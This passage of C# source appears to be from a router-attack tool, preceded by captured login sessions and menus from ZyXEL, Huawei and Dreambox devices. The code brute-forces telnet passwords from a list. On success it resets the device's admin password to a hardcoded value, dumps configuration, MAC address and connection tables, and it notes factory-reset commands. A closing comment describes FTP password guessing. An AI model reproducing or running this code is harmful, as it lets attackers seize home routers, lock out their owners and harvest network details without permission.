       My Login= zemzem2                    Nailed-Up Connection= Yes
       My Password= ********              Session Options:
       Authen= CHAP/PAP                     Edit Filter Sets= No
                                            Idle Timeout(sec)= N/A
                                          Edit Traffic Redirect= No

                    Press ENTER to Confirm or ESC to Cancel:
                    */
                    /*
                                           Menu 21 - Filter Set Configuration

     Filter                               Filter
     Set #        Comments                Set #        Comments
     ------  -----------------            ------  -----------------
       1      _______________               7      _______________
       2      _______________               8      _______________
       3      _______________               9      _______________
       4      _______________              10      _______________
       5      _______________              11      _______________
       6      _______________              12      _______________



                    Enter Filter Set Number to Configure= 0

                    Edit Comments= N/A

                    Press ENTER to Confirm or ESC to Cancel:
                    */
                    /*
                                            Menu 21.1 - Filter Rules Summary

 # A Type                       Filter Rules                              M m n
 - - ---- --------------------------------------------------------------- - - -
 1 N
 2 N
 3 N
 4 N
 5 N
 6 N








                  Enter Filter Rule Number (1-6) to Configure:

                    */
                    /*
                                            Menu 21.1.1 - TCP/IP Filter Rule

                   Filter #: 1,1
                   Filter Type= TCP/IP Filter Rule
                   Active= No
                   IP Protocol= 0     IP Source Route= No
                   Destination: IP Addr=
                                IP Mask=
                                Port #=
                                Port # Comp= None
                        Source: IP Addr=
                                IP Mask=
                                Port #=
                                Port # Comp= None
                   TCP Estab= N/A
                   More= No           Log= None
                   Action Matched= Check Next Rule
                   Action Not Matched= Check Next Rule

                   Press ENTER to Confirm or ESC to Cancel:
Press Space Bar to Toggle.
                    */
                    /*
                                              Menu 22 - SNMP Configuration

                  SNMP:
                    Get Community= public
                    Set Community= public
                    Trusted Host= 0.0.0.0
                    Trap:
                      Community= public
                      Destination= 0.0.0.0









                    Press ENTER to Confirm or ESC to Cancel:
                    */
                    /*
                                              Menu 24 - System Maintenance

                         1.  System Status
                         2.  System Information and Console Port Speed
                         3.  Log and Trace
                         4.  Diagnostic
                         5.  Backup Configuration
                         6.  Restore Configuration
                         7.  Upload Firmware
                         8.  Command Interpreter Mode
                         9.  Call Control
                         10. Time and Date Setting
                         11. Remote Management





                          Enter Menu Selection Number:
                    */
                    /*
                                              Enter Menu Selection Number: 8


Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
ras> help
Valid commands are:
sys             exit            ether           wan
ip              bridge
ras>
                    */
                    /*
                                         Menu 24.11 - Remote Management Control

     TELNET Server:
       Server Port = 23                   Server Access = ALL
       Secured Client IP = 0.0.0.0

     FTP Server:
       Server Port = 21                   Server Access = ALL
       Secured Client IP = 0.0.0.0

     Web Server:
       Server Port = 80                   Server Access = ALL
       Secured Client IP = 0.0.0.0





                    Press ENTER to Confirm or ESC to Cancel:
                    */




                    //********************************************************
                    //**************************
                    //*                        *
                    //*   The Gemini Project   *
                    //*                        *
                    //**************************

                    //welcome on your dreambox! - Kernel 2.6.9 (17:51:55).

                    //dreambox login: admin
                    //Password:
                    //Login incorrect
                    //dreambox login:
                    //
                    //root/dreambox


                    //********************************************************
                    //***************************
                    //*                         *
                    //*   The Gemini Project    *
                    //*                         *
                    //***************************
                    //*   Prepared By "drhg"    *
                    //*  ( Dream-Gaza Team )    *
                    //*   www.dreamgaza.com     *
                    //***************************

                    //Checking Kernel, Please Wait ....

                    //Kernel 2.6.9.
                    //md5sum (dreambox Linux ppc ).
                    //head.ko = 308509 bytes.
                    //Safe, NO 'clone bomb' found ... Congratulations.

                    //Enjoy Original Gemini Project  without Time Bomb !.
                    //---------------------------------------------------

                    //(Friday, 17 September 2010).
                    //welcome on your dreambox! - Kernel 2.6.9 (10:46:22).


                    //dreambox login: bad
                    //Password:
                    //Login incorrect
                    //dreambox login: root
                    //Password:
                    //Login incorrect
                    //dreambox login: root
                    //Password:
                    //Login incorrect

                    //********************************************************
                    //OpenDreambox 1.5.0 dm800

                    //dm800 login:
                    //dm800 login: bad
                    //Password:
                    //Login incorrect
                    //dm800 login: root
                    //root@dm800:~#
                    //CCcam_2011             head                   pyhtmlizer
                    //StartNabCam            hexdump                python
                    //\[                     hostname               rdjpgcom
                    //addgroup               hotplug                readlink
                    //adduser                id                     reboot
                    //ar                     ifconfig               reboot.sysvinit
                    //arping                 ifdown                 renice
                    //ash                    ifup                   reset
                    //automount              im                     rjoe
                    //avahi-daemon           inadyn                 rm
                    //awk                    inadyn_script.sh       rmdir
                    //basename               inetd                  rmmod
                    //bdpoll                 init                   route
                    //bookify                init.sysvinit          rquotad
                    //bunzip2                insmod                 run-parts
                    //busybox                ip                     runlevel
                    //bzcat                  ipkg                   rx
                    //cat                    ipkg-cl                scp
                    //cftp                   ipkg-link              sed
                    //chat                   iwconfig               seq
                    //chgrp                  iwgetid                sfdisk
                    //chmod                  iwlist                 sh
                    //chown                  iwpriv                 sha1sum
                    //chroot                 iwspy                  showiframe
                    //chvt                   jmacs                  showmount
                    //cjpeg                  joe                    shutdown
                    //ckeygen                jpegtran               shutdown.sysvinit
                    //clear                  jpico                  sleep
                    //conch                  jstar                  smartctl
                    //cp                     kill                   smartd
                    //cpio                   killall                smbd
                    //crond                  killall5               sort
                    //crontab                klogd                  ssh
                    //cut                    last                   start-stop-daemon
                    //czap                   last.sysvinit          statd
                    //date                   lastb                  streamproxy
                    //dbclient               ldconfig               strings
                    //dbus-cleanup-sockets   less                   stty
                    //dbus-daemon            lessecho               su
                    //dbus-launch            lesskey                sulogin
                    //dbus-monitor           ln                     swapoff
                    //dbus-send              loadfont               swapon
                    //dbus-uuidgen           loadkmap               sync
                    //dc                     lockd                  sysctl
                    //dccamd                 logger                 syslogd
                    //dd                     login                  szap
                    //deallocvt              logname                t-im
                    //delgroup               logread                tail
                    //deluser                lore                   tap2deb
                    //depmod                 losetup                tap2rpm
                    //depmod.26              ls                     tapconvert
                    //df                     lsmod                  tar
                    //dirname                mailmail               tda1002x
                    //djpeg                  makedevs               tee
                    //dmesg                  manhole                telinit
                    //dos2unix               map-mbone              telnet
                    //dropbear               mc                     telnetd
                    //dropbearconvert        mcedit                 termidx
                    //dropbearkey            mcmfmt                 test
                    //dropbearmulti          mcview                 time
                    //du                     md5sum                 tkconch
                    //dumpkmap               mesg                   top
                    //dvbsnoop               mesg.sysvinit          touch
                    //dvbtraffic             mkdir                  tput
                    //e2fsck                 mke2fs                 tr
                    //echo                   mkfifo                 traceroute
                    //egrep                  mkfs.ext2              trial
                    //enigma2                mkfs.ext3              true
                    //enigma2.sh             mknod                  tset
                    //env                    mkswap                 tty
                    //ethtool                mktap                  tuxtxt
                    //exportfs               mktemp                 twistd
                    //expr                   modprobe               tzap
                    //false                  more                   udhcpc
                    //fbset                  mount                  umount
                    //fdisk                  mountd                 uname
                    //fdisk.util-linux       mountpoint             uniq
                    //femon                  mrinfo                 unix2dos
                    //fgrep                  mrouted                unzip
                    //find                   mv                     update-alternatives
                    //free                   nc                     update-inetd
                    //fsck.ext2              netstat                update-modules
                    //fsck.ext3              nfs_server_script.sh   update-passwd
                    //ftpget                 nfsd                   update-rc.d
                    //ftpput                 nfsstat                uptime
                    //getepgchannels         nhfsgraph              utmpdump
                    //getkey                 nhfsnums               uudecode
                    //getty                  nhfsrun                uuencode
                    //grab                   nhfsstone              vi
                    //grep                   nmbd                   vlock
                    //gst-feedback           nslookup               vsftpd
                    //gst-feedback-0.10      od                     wall
                    //gst-inspect            openvpn                wall.sysvinit
                    //gst-inspect-0.10       openvpn_script.sh      watch
                    //gst-launch             openvt                 wc
                    //gst-launch-0.10        passwd                 wdog
                    //gst-typefind           patch                  wget
                    //gst-typefind-0.10      pidof                  which
                    //gst-visualise-0.10     pidof.sysvinit         who
                    //gst-xmlinspect         ping                   whoami
                    //gst-xmlinspect-0.10    pivot_root             wpa_cli
                    //gst-xmllaunch          poff                   wpa_passphrase
                    //gst-xmllaunch-0.10     pon                    wpa_supplicant
                    //gunzip                 portmap                wrjpgcom
                    //gzip                   poweroff               xargs
                    //halt                   pppd                   yes
                    //halt.sysvinit          printf                 zcat
                    //hddtemp                ps                     zeroconf
                    //hdparm                 pwd
                    //root@dm800:~#
                    //root@dm800:~# passwd
                    //Changing password for root
                    //Enter the new password (minimum of 5, maximum of 8 characters)
                    //Please use a combination of upper and lower case letters and numbers.
                    //Enter new password:
                    //Re-enter new password:
                    //Password changed.
                    //root@dm800:~#


                    //********************************************************
                    //BusyBox on (none) login: bad
                    //Password:
                    //Login incorrect

                    //BusyBox on (none) login: admin
                    //Password:


                    //BusyBox v0.61.pre (2008.01.25-06:33+0000) Built-in shell (ash)
                    //Enter 'help' for a list of built-in commands.

                    //# help

                    //Built-in commands:
                    //-------------------
                    //        . : bg break builtin cd chdir continue eval exec exit export
                    //        false fc fg hash help jobs kill local pwd read readonly return
                    //        set setvar shift times trap true type ulimit umask unset wait


                    //********************************************************
                    //User Access Verification
                    //
                    //Password:
                    //Password:
                    //Password:
                    //% Bad passwords


                    //********************************************************
                    //Huawei Home Gateway 550
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //Login: bad
                    //Password:
                    //Login incorrect. Try again.
                    //Login: admin
                    //Password:
                    //Login incorrect. Try again.
                    //Login: admin
                    //Password:
                    //Authorization failed after trying 3 times!!!.
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //Login:

                    #endregion

                    foreach (string password in passwords)
                    {
                        Thread.Sleep(100);
                        try
                        {
                            Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                            Sock_scan.Connect(ip);


                            recv = Sock_scan.Receive(data);
                            stringdata = Encoding.ASCII.GetString(data, 0, recv);
                       //     Console.WriteLine("{0} -> Banner telnet: " + stringdata, myip);

                            //Console.WriteLine("DEBUG Trying Password:{0}", password);
                            //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
                            Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password+"\r"),SocketFlags.None);
                            /*
                            Byte[] smk = new Byte[password.Length];
                            for (int i = 0; i < password.Length; i++)
                            {
                                Byte ss = Convert.ToByte(password[i]);
                                smk[i] = ss;
                            }
                            Sock_scan.Send(smk, 0, smk.Length, SocketFlags.None);
                            */

                            //Thread.Sleep(100);
                            
                            recv = Sock_scan.Receive(data);
                            stringdata = Encoding.ASCII.GetString(data, 0, recv);
                            //Console.WriteLine("{0} -> Response telnet: " + stringdata, myip);
                            recv = Sock_scan.Receive(data);
                            stringdata = Encoding.ASCII.GetString(data, 0, recv);
                            Console.WriteLine("{0} -> Response telnet02: " + stringdata, myip);
                            if (stringdata == "")
                            {
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> Response telnet02b: " + stringdata, myip);
                            }

                            //stringdata = null;
                            //bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
                            //stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
                            //Console.WriteLine("Response telnet: " + strRetPage);
                            //while (bytes > 0)
                            //{
                            //    bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
                            //    stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
                            //    Console.WriteLine("Response telnet: " + strRetPage);
                            //}

                            

                            //Bad Password!!!
                            if (stringdata.Contains("assword:") || stringdata.Contains("Bad Password"))    //stringdata.Contains("*")
                            {
                            //    Console.WriteLine("{0} -> bad telnet password: {1}\n", myip, password);
                                Sock_scan.Close();
                            }
                            else
                            {
                                Console.WriteLine("***********************************************************");
                                Console.WriteLine("{0} -> TELNET PASSWORD FOUND: {1}\n", myip, password);
                                Console.WriteLine("***********************************************************");

                                if(stringdata.Contains("ZyXEL"))    //1234
                                {
                                    if (stringdata.Contains("Menu"))    //1234
                                    {
                                        Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("23" + "\r"), SocketFlags.None);
                                        recv = Sock_scan.Receive(data);
                                        stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                        Console.WriteLine("{0} -> " + stringdata, myip);

                                        //             Menu 23 - System Password
                                         //Old Password= ?
                                         //New Password= ?
                                         //Retype to confirm= ?

                                        Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + "\r"), SocketFlags.None);
                                        recv = Sock_scan.Receive(data);
                                        stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                        Console.WriteLine("{0} -> " + stringdata, myip);

                                        Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
                                        recv = Sock_scan.Receive(data);
                                        stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                        Console.WriteLine("{0} -> " + stringdata, myip);

                                        Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
                                        recv = Sock_scan.Receive(data);
                                        stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                        Console.WriteLine("{0} -> " + stringdata, myip);

                                        Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("\r"), SocketFlags.None);
                                        recv = Sock_scan.Receive(data);
                                        stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                        Console.WriteLine("{0} -> " + stringdata, myip);

                                        //(Saving to ROM...)
                                        //Retour menu
                                    }
                                    else
                                    {
                                        Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys adminPassword j3R0m3!!" + "\r"), SocketFlags.None);
                                        recv = Sock_scan.Receive(data);
                                        stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                        Console.WriteLine("{0} -> " + stringdata, myip);
                                    }
                                }
                                else
                                {
                                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys password j3R0m3!!" + "\r"), SocketFlags.None);
                                    recv = Sock_scan.Receive(data);
                                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                    Console.WriteLine("{0} -> " + stringdata, myip);
                                    //save ok, new password is: j3R0m3!!.

                                    ////Exemple: Vulcan
                                    ////Erreur: Commande Invalide     
                                    ////$passwd
                                    //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
                                    ////Enter Old Password:
                                    //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
                                    ////Enter New Password:
                                    //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
                                    ////Confirm New Password:
                                    //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
                                    ////Set Done
                                    ////SINON:    Erreur: Combinaison nom d'utilisateur/mot de passe invalide
                                }

                                Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("show all" + "\r"), SocketFlags.None);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);


                                //***************
                                Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys atsh" + "\r"), SocketFlags.None);   //for MAC address
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);


                                /*
                                    D-Link DSL 526B                                 >restoredefault
                                    Huawei SmartAX MT882a              >sys romreset
                                    TP-Link TD-8817                                >sys romreset
                                */

                                //***************
                                //For MT882A
                                /*
                                MT882a> ether config
                                --------------- NDIS CONFIGURATION BLOCK ----------------
                                type=1 flags=0001
                                Board/Chassis:1  Lines/Board:1  Channels/Lines:2 Total Channel:2
                                task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
                                board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
                                board-pp (8042c8f0)
                                804273fc
                                line-pp (8042c8f4)
                                8042956c
                                chann-pp (8042c8f8)
                                804bf8a4 804bfe34
                                --------------- BOARD DISPLAY ---------------------------
                                ID  slot#  n-line  n-chann  status  line-cfg  chann-cfg
                                00      0       1        2    0001  8042c8bc    8042c8d0
                                --------------- LINE  DISPLAY ---------------------------
                                ID  line#  board-id  n-chann  chann-cfg
                                00      1  00              2  8042c8d0
                                --------------- CHANNEL DISPLAY -------------------------
                                ID  chan#  line-id  board-id  address name
                                00      1  00       00        804bf8a4  enet0
                                01      2  00       00        804bfe34  enet1
                                */
                                Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ether config" + "\r"), SocketFlags.None);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);


                                Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip tcp status" + "\r"), SocketFlags.None);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);

                                /*
                                MT882a> ip tcp status
                                ( 1)tcpRtoAlgorithm              4     ( 2)tcpRtoMin                    0
                                ( 3)tcpRtoMax           4294967295     ( 4)tcpMaxConn                  16
                                ( 5)tcpActiveOpens               0     ( 6)tcpPassiveOpens            477
                                ( 7)tcpAttemptFails             42     ( 8)tcpEstabResets              22
                                ( 9)tcpCurrEstab                 1     (10)tcpInSegs                 9765
                                (11)tcpOutSegs                2549     (12)tcpRetransSegs             389
                                (14)tcpInErrs                    2     (15)tcpOutRsts                  93
                                 tcbsInUseCnt = 4
                                    &TCB Rcv-Q Snd-Q  Local socket           Remote socket          State
                                804fdce4     0   621  41.248.40.35:23        196.12.232.120:61565   Estab 0
                                804fd66c     0     0  0.0.0.0:21             0.0.0.0:0              Listen 0
                                804fd558     0     0  0.0.0.0:7547           0.0.0.0:0              Listen (S) 0
                                804fd444     0     0  0.0.0.0:80             0.0.0.0:0              Listen (S) 0
                                */

                                Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip udp status" + "\r"), SocketFlags.None);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);



                                //ATTACK
                                /*
                                MT882a> ip ping
                                Usage: ping <hostid>
                                MT882a> ip ping www.google.com
                                Resolving www.google.com... 173.194.67.105
                                      sent      rcvd  rate    rtt     avg    mdev     max     min
                                         1         1  100      80      80       0      80      80
                                         2         2  100      80      80       0      80      80
                                         3         3  100      80      80       0      80      80
                                */

                                /*
                                MT882a> ip route
                                status          add             addiface        addprivate
                                addrom          drop
                                MT882a> ip route status
                                Dest            FF Len Device  Gateway         Metric stat Timer  Use   RN
                                41.248.40.1     00 32  poe0    41.248.40.1       1    0329 0      0     ISP-0
                                192.168.1.0     00 24  enet0   192.168.1.1       1    041b 0      0
                                default         00 0   poe0    ISP-0             2    00ab 0      3245  ISP-0
                                */

                                /*
                                MT882a> ether driver
                                cnt             status          config          ackdrop
                                macnum          ackmode         etherppp        wan2lan
                                MT882a> ether driver cnt
                                disp
                                MT882a> ether driver cnt disp
                                Usage: disp <name>
                                MT882a> ether driver status
                                Usage: driver status <ch-name>
                                MT882a> ether driver config
                                Usage: driver config [0|1=auto|normal] [0|1=10|100] [0|1=HD|FD] <ch-name>
                                MT882a> ether driver ackdrop
                                current ack drop number is 0
                                ack drop cnt=0
                                Usage: ackdrop <number>
                                MT882a> ether driver macnum
                                Please input allowed mac number(0~255), 0 means no limitation
                                Current allowed mac number: 0
                                MT882a> ether driver ackmode
                                TCP ACK mode: off
                                ACK length: 90
                                TCP ACK mode type: Task
                                MT882a> ether driver etherppp
                                PPP check : on

                                MT882a> ether driver wan2lan
                                Usage: wan2lan [on||off] <number>
                                Current wan2lan feature status: off
                                */



                                /*
                                MT882a> wan
                                atm             node            hwsar           adsl
                                tsarm
                                MT882a> wan atm
                                test            mpoasendloop    oam             vcpool
                                MT882a> wan atm test
                                Usage: test [fix|rand|period|oam|loopback]
                                MT882a> wan node
                                index           display         clear           save
                                ispname         enable          disable         encap
                                mux             vpi             vci             qos
                                pcr             scr             mbs             cdvt
                                wanip           remoteip        bridge          routeip
                                nat             rip             multicast       callsch
                                service         nailedup        filter          ppp
                                mtu             default_r
                                MT882a> wan node display
                                WAN node index = 1
                                Active = no
                                Route IP = off
                                Bridge = off
                                Name =
                                Encapsulcation <2:PPPoE|3:RFC1483|4:PPPoA|5:Enet Encap> = 0
                                Mux <1:LLC|2:VC> = 0
                                VPI/VCI = 0 / 0
                                PPPoE service name =
                                PPP username =
                                PPP password =
                                PPP authentication <1:PAP|2:CHAP|3:BOTH> = 0
                                SUA/NAT is disabled
                                Static IP address
                                WAN IP address        = 0.0.0.0
                                Remote IP address     = 0.0.0.0
                                Remote IP subnet mask = 0.0.0.0
                                Idle timeout = 0
                                Call scheduling set =   1  1  1  1
                                Nailed-up connection = off
                                QOS Type <2:CBR|3:UBR|4:rtVBR|5:nrtVBR|6:GFR> = 0
                                QOS PCR/SCR/MBS/CDVT =     0,    0,    0,    0
                                RIP direction <0:none|1:both|2:in|3:out>= 0
                                RIP version <0:RIP-1|1:RIP-2B|2:RIP-2M> = 0
                                Multicast <0:IGMP-v2|1:IGMP-v1|2:none>  = 0
                                Incoming protocol filter set =   1  1  1  1
                                Incoming device filter set   =   1  1  1  1
                                Outgoing protocol filter set =   1  1  1  1
                                Outgoing device filter set   =   1  1  1  1
                                MT882a> wan node wanip
                                Usage: wan node wanip <static> <ip address>
                                or:    wan node wanip <dynamic>
                                errcode = -4
                                */



                                /*
                                MT882a> wan adsl
                                chandata        close           coding          defbitmap
                                linedata        open            opencmd         opmode
                                perfdata        reset           status          version
                                vendorid        utopia          nearituid       farituid
                                cellcnt         display         rateadap        dumpcondition
                                sampletime      noisegt         noisemargin     persisttime
                                timeinterval    defectcheck     txgain          targetnoise
                                txfilter        setrvid         txtones         snroffset
                                errorsecond     diag            watchdog        fwversion
                                uptime          dumprate        annex
                                MT882a> wan adsl display
                                shutdown        rateup
                                MT882a> wan adsl fwversion
                                DMT FwVer: 3.11.2.151_A_TC3086 HwVer: T14F7_5.0
                                
                                MT882a> wan adsl utopia
                                UTOPIA parameters:
                                   level: 1
                                   fast address: 0
                                   interleaved address: 1
                                MT882a> wan adsl coding
                                line coding: DMT
                                MT882a> wan adsl txtones
                                usage: <start tone> <end tone> tone=0x6~0x1F
                                current value: start_tone=6 end_tone=1f
                                MT882a> wan adsl opmode
                                operational mode: ITU G.992.5(ADSL2PLUS)
                                
                                MT882a> wan adsl uptime
                                    ADSL uptime   122:15:16
                                    MT882a> wan adsl sampletime
                                    Usage: min
                                    MT882a> wan adsl linedata
                                    far             near
                                    MT882a> wan adsl linedata near
                                    relative capacity occupation: 100%
                                    noise margin downstream: 37.0 db
                                    output power upstream: 11.3 dbm
                                    attenuation downstream: 13.7 db
                                    MT882a> wan adsl linedata far
                                    relative capacity occupation: 100%
                                    noise margin upstream: 34.5 db
                                    output power downstream: 19.3 dbm
                                    attenuation upstream: 9.6 db
                                    carrier load: number of bits per symbol(tone)
                                    tone   0- 31: 00 00 00 00 02 25 56 66 66 66 66 66 55 44 43 20
                                    tone  32- 63: 00 00 00 00 00 00 00 00 00 00 04 34 45 55 54 55
                                    tone  64- 95: 10 44 53 65 53 05 05 56 66 65 53 65 36 65 66 54
                                    tone  96-127: 55 65 55 45 55 54 45 45 14 55 41 55 45 55 45 51
                                    tone 128-159: 54 45 54 55 44 55 55 55 55 45 65 45 45 46 54 56
                                    tone 160-191: 54 55 45 50 04 00 45 05 05 44 54 54 55 35 40 54
                                    tone 192-223: 55 55 50 45 05 00 55 00 40 00 00 00 00 00 00 00
                                    tone 224-255: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    tone 256-287: 00 00 50 00 00 00 50 00 00 40 00 40 00 00 00 00
                                    tone 288-319: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    tone 320-351: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    tone 352-383: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    tone 384-415: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    tone 416-447: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    tone 448-479: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    tone 480-511: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                
                                MT882a> dot1q disp
                                        802.1Q Tagged-based VLAN: Inactive(1)

                                         Port | PVID   || Port | PVID   || Port | PVID   || Port | PVID   ||
                                        ------+--------++------+--------++------+--------++------+--------++
                                           e1 |     1  ||
                                           p0 |     1  ||   p1 |     1  ||   p2 |     1  ||   p3 |     1  ||
                                           p4 |     1  ||   p5 |     1  ||   p6 |     1  ||   p7 |     1  ||
                                            u |     1  ||
                                          cpu |    15  ||

                                        No|Act| VID|    Name   |        Egress Port
                                        --+---+----+-----------+------------------------------------------
                                                               |    Tagged Egress Port
                                                               +------------------------------------------
                                         0| N |   0|           |
                                                               |
                                         1| N |   0|           |
                                                               |
                                         2| N |   0|           |
                                                               |
                                         3| N |   0|           |
                                                               |
                                         4| N |   0|           |
                                                               |
                                         5| N |   0|           |
                                                               |
                                         6| N |   0|           |
                                                               |
                                         7| N |   0|           |
                                                               |
                                         8| N |   0|           |
                                                               |
                                         9| N |   0|           |
                                                               |
                                        10| N |   0|           |
                                                               |
                                        11| N |   0|           |
                                                               |
                                        12| N |   0|           |
                                                               |
                                        13| N |   0|           |
                                                               |
                                        14| Y |   1|     vlan14|e1,u,p0,p1,p2,p3,p4,p5,p6,p7
                                                               |
                                        15| Y |  15|     vlan15|e1,u
                                                               |
                                */






                                Sock_scan.Close();
                                break;
                            }
                        }
                        catch (Exception e)
                        {
                            Console.WriteLine("DEBUG EXCEPTION02: {0} -> " + e.Message, myip);
                        }
                    }
                }
                else
                {
                    Console.WriteLine("{0} DEBUG no telnet Password: "+banner,myip);
                }
                
//                Sock_scan.Close();
        }

        /// <summary>
        /// Opens one TCP connection to port 21 of <paramref name="myip"/>, prints the
        /// greeting, then sends a USER admin / PASS pair for every entry of the
        /// <c>passwords</c> collection (declared outside this view) on that same
        /// connection, printing each server reply. The loop stops at the first reply
        /// whose text contains "230".
        /// </summary>
        /// <param name="myip">Dotted IPv4 address of the FTP server; parsed with IPAddress.Parse.</param>
        /// <remarks>
        /// USER and PASS travel in cleartext over plain TCP, and every candidate password is
        /// also echoed to the console, so both the wire and the captured output hold credentials.
        /// Seen from the server, this is a run of USER/PASS pairs for one account on a single
